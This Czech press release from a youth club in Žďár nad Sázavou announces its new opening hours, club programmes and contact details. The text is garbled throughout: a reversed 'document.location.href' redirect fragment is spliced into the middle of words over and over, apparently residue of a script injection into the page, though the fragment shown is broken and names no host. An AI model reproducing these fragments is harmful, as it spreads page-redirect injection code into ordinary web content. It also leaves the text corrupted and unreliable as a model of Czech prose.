Rainbow page separator

Nová otevírací doba na Ponorce

Středa, 15. dubna 2015

Ponorka Žďár nad Sázavou

Žďár nad Sázavou /Nízkoprahové zařízení pro děti a mládež Ponorka má NOVOU OTEVÍRACÍ DOBU. „Hlavním důvodem té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to úpravy byla především snaha přizpůsobit se potřebám mladších (1. stupeň ZŠ) i starších (2. stupeň ZŠ, SŠ a mladí lidé do 20 let) uživatelů a zvýšit jejich zájem o využívání služeb Ponorky NZDM,“ dodává Mgr. Monika Strnadová, další pracovnice Ponorky.

Změna se dotkla nejvíce pondělí, kdy jsou nyní pro mladší uživatele vyhrazeny čtyři odpolední hodiny. Od 12:30 do 14:30 mohou děti přijít na klasický klub – bude jim zde poskytnut bezpečný pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tor pro trávení volného času, doučování, pomoc s domácími úkoly, volnočasové aktivity, pomoc a podpora při řešení problémových situací, rozhovory s pracovníky, sdílení a kontakt s vrstevníky.

„Další dvě hodiny (14:30 – 16:30) patří „tvořeníčku“. S dětmi se pracovníci a externí lek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toři věnují různým aktivizačním činnostem, vždy podle tématiky v daném měsíci. Uživatelům je umožněno nahlédnutí do různých okruhů zájmových aktivit. Pomocí [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho budou děti moci zjistit a ujasnit si, v čem jsou dobré, co je baví, kam mohou směřovat svůj budoucí zájem. Věnujeme se nejen výtvarným a tvořivým činnostem, ale také hudbě, zpěvu, tanci, sportu.,“ doplňuje pracovnice Tereza Musilová. Nenásilnou formou je při těch[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to aktivitách také kladen důraz na prevenci rizikového chování a nežádoucích jevů. Pro starší uživatele (2. stupeň ZŠ, SŠ a mladí lidé do 20 let) je pondělní klub otevřen od 17:00 až do 19:30. Celý klub mohou tedy využít i uživatelé, kteří mají během odpoledne jiné důležité povinnosti a běžně nestíhají docházet do zařízení.

Ve středu odpoledne se mladší i starší uživatelé, jak je již zvykem, mohou potkat s pracovníky Ponorky, v rámci streetworku, v terénu. Cílem té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to služby je pomáhat dětem a mladým lidem v jejich přirozeném prostředí – sdílení starostí i radostí, předávání užitečných kontaktů a nabídka volnočasových aktivit v rámci možností. Od 17:00 je pak vždy pro starší uživatele připraven pracovníkem, externis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou či dobrovolníkem speciální program na klubu nazvaný jako „Jiná středa“.

Páteční odpolední klub bude otevřen pouze pro starší uživatele po celou provozní dobu. Během tří hodin mohou tedy ti[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to uživatelé a zájemci ještě před víkendem plnohodnotně využít služeb Ponorky NZDM.

Au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torka tiskové zprávy: Bc. Veronika Brych[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tová

Otevírací doba Ponorky NZDM ve zkratce

 Otevírací doba Ponorka Žďár nad Sázavou
*v letním období může být zaměněno za terénní sociální práci

Nízkoprahové zařízení pro děti a mládež
Posláním nízkoprahového zařízení pro děti a mládež Ponorka, je posky[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovat zázemí, pomoc a podporu dětem a dospívajícím ve Žďáře nad Sázavou, kteří se ocitli v nepříznivé životní situaci nebo jsou jí ohroženi, a přispívat ke zlepšení kvality jejich života.
Posky[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tované služby: „kamenný“ nízkoprahový klub Ponorka na ulici Nádražní 44, terénní sociální práce (streetwork),
Kontakt: Ponorka – nízkoprahové zařízení pro děti a mládež, Nádražní 44, Žďár nad Sázavou 591 01
mob.: 777 755 436, e-mail: ponorka@zdar.charita.cz
web: http://www.ponorka.ecn.cz ; http://www.zdar.charita.cz